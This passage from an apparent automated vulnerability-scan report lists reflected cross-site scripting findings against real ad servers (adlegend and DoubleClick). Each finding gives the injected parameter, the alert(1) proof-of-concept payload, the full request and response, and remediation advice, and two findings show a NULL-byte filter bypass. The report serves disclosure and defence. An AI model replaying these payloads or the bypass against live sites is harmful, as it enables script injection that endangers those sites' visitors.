P3P: policyref="http://ad.adlegend.com/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI"
Set-Cookie: PrefID=43-847748576; expires=Tue, 07 May 2013 10:37:45 GMT; path=/; domain=.adlegend.com
Set-Cookie: CSList=1076702/1080850,1090846/1088030,0/0,0/0,0/0; expires=Fri, 05 Aug 2011 22:37:45 GMT; path=/; domain=.adlegend.com
Content-Type: application/x-javascript
Content-Length: 447
Connection: close

document.write('<A HREF="http://ad.adlegend.com/click.ng?spacedesc=2122025_1080850_300x160_1111357_2122025&af=2095360&ml_pkgkw=-%253A%2522%2522&ml_pbi=-2122025&ml_camp=1076702&ml_crid=2127402&click=&89b76'-alert(1)-'aee1add2168=1http://www.nbc.com/the-apprentice/" TARGET="_blank">
...[SNIP]...

5.12. http://ad.adlegend.com/jscript [target parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.adlegend.com
Path:   /jscript

Issue detail

The value of the target request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 36136'%3balert(1)//ba143b688f2 was submitted in the target parameter. This input was echoed as 36136';alert(1)//ba143b688f2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jscript?spacedesc=2122025_1080850_300x160_1111357_2122025&ML_NIF=N&target=_blank36136'%3balert(1)//ba143b688f2&@CPSC@= HTTP/1.1
Host: ad.adlegend.com
Proxy-Connection: keep-alive
Referer: http://www.nbcconnecticut.com/news/politics/Malloys-Plan-B-Cuts-4700-State-Jobs---121401459.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PrefID=43-847748576; CSList=1090846/1088030,0/0,0/0,0/0,0/0

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 22:37:45 GMT
Server: Apache/1.3.37 (Unix)
Cache-Control: no-cache, must-revalidate
Expires: Tue, 1 Jan 1970 01:01:01 GMT
Pragma: no-cache
P3P: policyref="http://ad.adlegend.com/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI"
Set-Cookie: PrefID=43-847748576; expires=Tue, 07 May 2013 10:37:45 GMT; path=/; domain=.adlegend.com
Set-Cookie: CSList=1076702/1080850,1090846/1088030,0/0,0/0,0/0; expires=Fri, 05 Aug 2011 22:37:45 GMT; path=/; domain=.adlegend.com
Content-Type: application/x-javascript
Content-Length: 444
Connection: close

document.write('<A HREF="http://ad.adlegend.com/click.ng?spacedesc=2122025_1080850_300x160_1111357_2122025&af=2095360&ml_pkgkw=-%253A%2522%2522&ml_pbi=-2122025&ml_camp=1076702&ml_crid=2127402&click=http://www.nbc.com/the-apprentice/" TARGET="_blank36136';alert(1)//ba143b688f2">
...[SNIP]...

5.13. http://ad.doubleclick.net/adj/N5315.277603.HORSERACINGNATION/B5195285.2 [adurl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5315.277603.HORSERACINGNATION/B5195285.2

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 829b4'-alert(1)-'c4dfa29cc3f was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5315.277603.HORSERACINGNATION/B5195285.2;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BwVjtPa7FTZ29OKX6lAfHuf3QArqb1eoBAAAAEAEg-MCvCzgAWJLgrJkZYMmGhYmIpIQQsgEZd3d3LmhvcnNlcmFjaW5nbmF0aW9uLmNvbboBCTcyOHg5MF9hc8gBCdoBOWh0dHA6Ly93d3cuaG9yc2VyYWNpbmduYXRpb24uY29tL3Byb2JhYmxlcy9wcm9iYWJsZXMuYXNweOABBMACAuACAOoCGVN0YWtlc1RyYWNrZXJCYW5uZXI3Mjh4OTD4AvDRHoADAZADpAOYA6QDqAMB4AQB&num=0&sig=AGiWqtwkE7_2jvvdMjZ4a1q1fw5Fzb0SsQ&client=ca-pub-4072016369212427&adurl=829b4'-alert(1)-'c4dfa29cc3f HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.horseracingnation.com/probables/probables.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 898
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 07 May 2011 20:41:52 GMT
Expires: Sat, 07 May 2011 20:41:52 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b00/4/1ba/%2a/p;237330678;4-0;0;59094481;3454-728/90;41171150/41188937/1;;~sscs=%3fhttp://adclick.g.doubleclick.net/aclk?
...[SNIP]...
4uY29tL3Byb2JhYmxlcy9wcm9iYWJsZXMuYXNweOABBMACAuACAOoCGVN0YWtlc1RyYWNrZXJCYW5uZXI3Mjh4OTD4AvDRHoADAZADpAOYA6QDqAMB4AQB&num=0&sig=AGiWqtwkE7_2jvvdMjZ4a1q1fw5Fzb0SsQ&client=ca-pub-4072016369212427&adurl=829b4'-alert(1)-'c4dfa29cc3fhttp://www.dishnetwork.com/redirects/promotion/offer50/default.aspx?WT.mc_id=DDHRNO50MAR7289&&utm_source=horseracingnation&utm_medium=display&utm_campaign=bl">
...[SNIP]...

5.14. http://ad.doubleclick.net/adj/N5315.277603.HORSERACINGNATION/B5195285.2 [ai parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5315.277603.HORSERACINGNATION/B5195285.2

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b68eb'-alert(1)-'a52fb17444a was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5315.277603.HORSERACINGNATION/B5195285.2;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BwVjtPa7FTZ29OKX6lAfHuf3QArqb1eoBAAAAEAEg-MCvCzgAWJLgrJkZYMmGhYmIpIQQsgEZd3d3LmhvcnNlcmFjaW5nbmF0aW9uLmNvbboBCTcyOHg5MF9hc8gBCdoBOWh0dHA6Ly93d3cuaG9yc2VyYWNpbmduYXRpb24uY29tL3Byb2JhYmxlcy9wcm9iYWJsZXMuYXNweOABBMACAuACAOoCGVN0YWtlc1RyYWNrZXJCYW5uZXI3Mjh4OTD4AvDRHoADAZADpAOYA6QDqAMB4AQBb68eb'-alert(1)-'a52fb17444a&num=0&sig=AGiWqtwkE7_2jvvdMjZ4a1q1fw5Fzb0SsQ&client=ca-pub-4072016369212427&adurl=;ord=1647648825? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.horseracingnation.com/probables/probables.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 07 May 2011 20:41:18 GMT
Content-Length: 7439

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Mar 15 12:20:52 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
lcmFjaW5nbmF0aW9uLmNvbboBCTcyOHg5MF9hc8gBCdoBOWh0dHA6Ly93d3cuaG9yc2VyYWNpbmduYXRpb24uY29tL3Byb2JhYmxlcy9wcm9iYWJsZXMuYXNweOABBMACAuACAOoCGVN0YWtlc1RyYWNrZXJCYW5uZXI3Mjh4OTD4AvDRHoADAZADpAOYA6QDqAMB4AQBb68eb'-alert(1)-'a52fb17444a&num=0&sig=AGiWqtwkE7_2jvvdMjZ4a1q1fw5Fzb0SsQ&client=ca-pub-4072016369212427&adurl=http%3a%2f%2fwww.dishnetwork.com/redirects/promotion/offer50/default.aspx%3FWT.mc_id%3DDDHRNO50MAR7289%26%26utm_source
...[SNIP]...

5.15. http://ad.doubleclick.net/adj/N5315.277603.HORSERACINGNATION/B5195285.2 [client parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5315.277603.HORSERACINGNATION/B5195285.2

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7c953'-alert(1)-'40ba6933c2b was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5315.277603.HORSERACINGNATION/B5195285.2;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BwVjtPa7FTZ29OKX6lAfHuf3QArqb1eoBAAAAEAEg-MCvCzgAWJLgrJkZYMmGhYmIpIQQsgEZd3d3LmhvcnNlcmFjaW5nbmF0aW9uLmNvbboBCTcyOHg5MF9hc8gBCdoBOWh0dHA6Ly93d3cuaG9yc2VyYWNpbmduYXRpb24uY29tL3Byb2JhYmxlcy9wcm9iYWJsZXMuYXNweOABBMACAuACAOoCGVN0YWtlc1RyYWNrZXJCYW5uZXI3Mjh4OTD4AvDRHoADAZADpAOYA6QDqAMB4AQB&num=0&sig=AGiWqtwkE7_2jvvdMjZ4a1q1fw5Fzb0SsQ&client=ca-pub-40720163692124277c953'-alert(1)-'40ba6933c2b&adurl=;ord=1647648825? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.horseracingnation.com/probables/probables.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 07 May 2011 20:41:48 GMT
Content-Length: 7435

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Mar 15 12:20:53 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
uYXRpb24uY29tL3Byb2JhYmxlcy9wcm9iYWJsZXMuYXNweOABBMACAuACAOoCGVN0YWtlc1RyYWNrZXJCYW5uZXI3Mjh4OTD4AvDRHoADAZADpAOYA6QDqAMB4AQB&num=0&sig=AGiWqtwkE7_2jvvdMjZ4a1q1fw5Fzb0SsQ&client=ca-pub-40720163692124277c953'-alert(1)-'40ba6933c2b&adurl=http%3a%2f%2fwww.dishnetwork.com/redirects/promotion/offer50/default.aspx%3FWT.mc_id%3DDDHRNO50MAR7289%26%26utm_source%3Dhorseracingnation%26utm_medium%3Ddisplay%26utm_campaign%3Dbl\">
...[SNIP]...

5.16. http://ad.doubleclick.net/adj/N5315.277603.HORSERACINGNATION/B5195285.2 [num parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5315.277603.HORSERACINGNATION/B5195285.2

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 405e3'-alert(1)-'c169dfd3f8e was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5315.277603.HORSERACINGNATION/B5195285.2;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BwVjtPa7FTZ29OKX6lAfHuf3QArqb1eoBAAAAEAEg-MCvCzgAWJLgrJkZYMmGhYmIpIQQsgEZd3d3LmhvcnNlcmFjaW5nbmF0aW9uLmNvbboBCTcyOHg5MF9hc8gBCdoBOWh0dHA6Ly93d3cuaG9yc2VyYWNpbmduYXRpb24uY29tL3Byb2JhYmxlcy9wcm9iYWJsZXMuYXNweOABBMACAuACAOoCGVN0YWtlc1RyYWNrZXJCYW5uZXI3Mjh4OTD4AvDRHoADAZADpAOYA6QDqAMB4AQB&num=0405e3'-alert(1)-'c169dfd3f8e&sig=AGiWqtwkE7_2jvvdMjZ4a1q1fw5Fzb0SsQ&client=ca-pub-4072016369212427&adurl=;ord=1647648825? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.horseracingnation.com/probables/probables.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 07 May 2011 20:41:32 GMT
Content-Length: 924

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b00/c/1ba/%2a/z;237330678;3-0;0;59094481;3454-728/90;41171149/41188936/1;;~sscs=%3fhttp://adclick.g.doubleclick.net/aclk?
...[SNIP]...
W5nbmF0aW9uLmNvbboBCTcyOHg5MF9hc8gBCdoBOWh0dHA6Ly93d3cuaG9yc2VyYWNpbmduYXRpb24uY29tL3Byb2JhYmxlcy9wcm9iYWJsZXMuYXNweOABBMACAuACAOoCGVN0YWtlc1RyYWNrZXJCYW5uZXI3Mjh4OTD4AvDRHoADAZADpAOYA6QDqAMB4AQB&num=0405e3'-alert(1)-'c169dfd3f8e&sig=AGiWqtwkE7_2jvvdMjZ4a1q1fw5Fzb0SsQ&client=ca-pub-4072016369212427&adurl=http%3a%2f%2fwww.dishnetwork.com/redirects/promotion/offer50/default.aspx%3FWT.mc_id%3DDDHRNO50MAR7289%26%26utm_source%3Dhor
...[SNIP]...

5.17. http://ad.doubleclick.net/adj/N5315.277603.HORSERACINGNATION/B5195285.2 [sig parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5315.277603.HORSERACINGNATION/B5195285.2

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2dbff'-alert(1)-'40368e22d83 was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5315.277603.HORSERACINGNATION/B5195285.2;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BwVjtPa7FTZ29OKX6lAfHuf3QArqb1eoBAAAAEAEg-MCvCzgAWJLgrJkZYMmGhYmIpIQQsgEZd3d3LmhvcnNlcmFjaW5nbmF0aW9uLmNvbboBCTcyOHg5MF9hc8gBCdoBOWh0dHA6Ly93d3cuaG9yc2VyYWNpbmduYXRpb24uY29tL3Byb2JhYmxlcy9wcm9iYWJsZXMuYXNweOABBMACAuACAOoCGVN0YWtlc1RyYWNrZXJCYW5uZXI3Mjh4OTD4AvDRHoADAZADpAOYA6QDqAMB4AQB&num=0&sig=AGiWqtwkE7_2jvvdMjZ4a1q1fw5Fzb0SsQ2dbff'-alert(1)-'40368e22d83&client=ca-pub-4072016369212427&adurl=;ord=1647648825? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.horseracingnation.com/probables/probables.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 07 May 2011 20:41:43 GMT
Content-Length: 7435

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Mar 15 12:20:53 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
OWh0dHA6Ly93d3cuaG9yc2VyYWNpbmduYXRpb24uY29tL3Byb2JhYmxlcy9wcm9iYWJsZXMuYXNweOABBMACAuACAOoCGVN0YWtlc1RyYWNrZXJCYW5uZXI3Mjh4OTD4AvDRHoADAZADpAOYA6QDqAMB4AQB&num=0&sig=AGiWqtwkE7_2jvvdMjZ4a1q1fw5Fzb0SsQ2dbff'-alert(1)-'40368e22d83&client=ca-pub-4072016369212427&adurl=http%3a%2f%2fwww.dishnetwork.com/redirects/promotion/offer50/default.aspx%3FWT.mc_id%3DDDHRNO50MAR7289%26%26utm_source%3Dhorseracingnation%26utm_medium%3Ddisplay%2
...[SNIP]...

5.18. http://ad.doubleclick.net/adj/N5315.277603.HORSERACINGNATION/B5195285.2 [sig parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5315.277603.HORSERACINGNATION/B5195285.2

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00c3452"-alert(1)-"e0b127a5f82 was submitted in the sig parameter. This input was echoed as c3452"-alert(1)-"e0b127a5f82 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /adj/N5315.277603.HORSERACINGNATION/B5195285.2;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BwVjtPa7FTZ29OKX6lAfHuf3QArqb1eoBAAAAEAEg-MCvCzgAWJLgrJkZYMmGhYmIpIQQsgEZd3d3LmhvcnNlcmFjaW5nbmF0aW9uLmNvbboBCTcyOHg5MF9hc8gBCdoBOWh0dHA6Ly93d3cuaG9yc2VyYWNpbmduYXRpb24uY29tL3Byb2JhYmxlcy9wcm9iYWJsZXMuYXNweOABBMACAuACAOoCGVN0YWtlc1RyYWNrZXJCYW5uZXI3Mjh4OTD4AvDRHoADAZADpAOYA6QDqAMB4AQB&num=0&sig=%00c3452"-alert(1)-"e0b127a5f82&client=ca-pub-4072016369212427&adurl=;ord=1647648825? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.horseracingnation.com/probables/probables.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 7243
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 07 May 2011 20:41:39 GMT
Expires: Sat, 07 May 2011 20:41:39 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Mar 15 12:20:52 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
W9uLmNvbboBCTcyOHg5MF9hc8gBCdoBOWh0dHA6Ly93d3cuaG9yc2VyYWNpbmduYXRpb24uY29tL3Byb2JhYmxlcy9wcm9iYWJsZXMuYXNweOABBMACAuACAOoCGVN0YWtlc1RyYWNrZXJCYW5uZXI3Mjh4OTD4AvDRHoADAZADpAOYA6QDqAMB4AQB&num=0&sig=%00c3452"-alert(1)-"e0b127a5f82&client=ca-pub-4072016369212427&adurl=http://www.dishnetwork.com/redirects/promotion/offer50/default.aspx?WT.mc_id=DDHRNO50MAR7289&&utm_source=horseracingnation&utm_medium=display&utm_campaign=bl");
v
...[SNIP]...

5.19. http://ad.doubleclick.net/adj/N5315.277603.HORSERACINGNATION/B5195285.2 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5315.277603.HORSERACINGNATION/B5195285.2

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00681c0"-alert(1)-"96a36e6e0e6 was submitted in the sz parameter. This input was echoed as 681c0"-alert(1)-"96a36e6e0e6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /adj/N5315.277603.HORSERACINGNATION/B5195285.2;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=L%00681c0"-alert(1)-"96a36e6e0e6&ai=BwVjtPa7FTZ29OKX6lAfHuf3QArqb1eoBAAAAEAEg-MCvCzgAWJLgrJkZYMmGhYmIpIQQsgEZd3d3LmhvcnNlcmFjaW5nbmF0aW9uLmNvbboBCTcyOHg5MF9hc8gBCdoBOWh0dHA6Ly93d3cuaG9yc2VyYWNpbmduYXRpb24uY29tL3Byb2JhYmxlcy9wcm9iYWJsZXMuYXNweOABBMACAuACAOoCGVN0YWtlc1RyYWNrZXJCYW5uZXI3Mjh4OTD4AvDRHoADAZADpAOYA6QDqAMB4AQB&num=0&sig=AGiWqtwkE7_2jvvdMjZ4a1q1fw5Fzb0SsQ&client=ca-pub-4072016369212427&adurl=;ord=1647648825? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.horseracingnation.com/probables/probables.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 7374
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 07 May 2011 20:41:10 GMT
Expires: Sat, 07 May 2011 20:41:10 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Mar 15 12:20:51 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
= escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3b00/7/1bd/%2a/v%3B237330678%3B5-0%3B0%3B59094481%3B3454-728/90%3B41171151/41188938/1%3B%3B%7Esscs%3D%3fhttp://adclick.g.doubleclick.net/aclk?sa=L%00681c0"-alert(1)-"96a36e6e0e6&ai=BwVjtPa7FTZ29OKX6lAfHuf3QArqb1eoBAAAAEAEg-MCvCzgAWJLgrJkZYMmGhYmIpIQQsgEZd3d3LmhvcnNlcmFjaW5nbmF0aW9uLmNvbboBCTcyOHg5MF9hc8gBCdoBOWh0dHA6Ly93d3cuaG9yc2VyYWNpbmduYXRpb24uY29tL3Byb2JhYmxlcy9wcm9iYWJs
...[SNIP]...

5.20. http://ad.doubleclick.net/adj/N5315.277603.HORSERACINGNATION/B5195285.2 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5315.277603.HORSERACINGNATION/B5195285.2

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e5ce2'-alert(1)-'27755194820 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5315.277603.HORSERACINGNATION/B5195285.2;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=Le5ce2'-alert(1)-'27755194820&ai=BwVjtPa7FTZ29OKX6lAfHuf3QArqb1eoBAAAAEAEg-MCvCzgAWJLgrJkZYMmGhYmIpIQQsgEZd3d3LmhvcnNlcmFjaW5nbmF0aW9uLmNvbboBCTcyOHg5MF9hc8gBCdoBOWh0dHA6Ly93d3cuaG9yc2VyYWNpbmduYXRpb24uY29tL3Byb2JhYmxlcy9wcm9iYWJsZXMuYXNweOABBMACAuACAOoCGVN0YWtlc1RyYWNrZXJCYW5uZXI3Mjh4OTD4AvDRHoADAZADpAOYA6QDqAMB4AQB&num=0&sig=AGiWqtwkE7_2jvvdMjZ4a1q1fw5Fzb0SsQ&client=ca-pub-4072016369212427&adurl=;ord=1647648825? HTTP/1.1
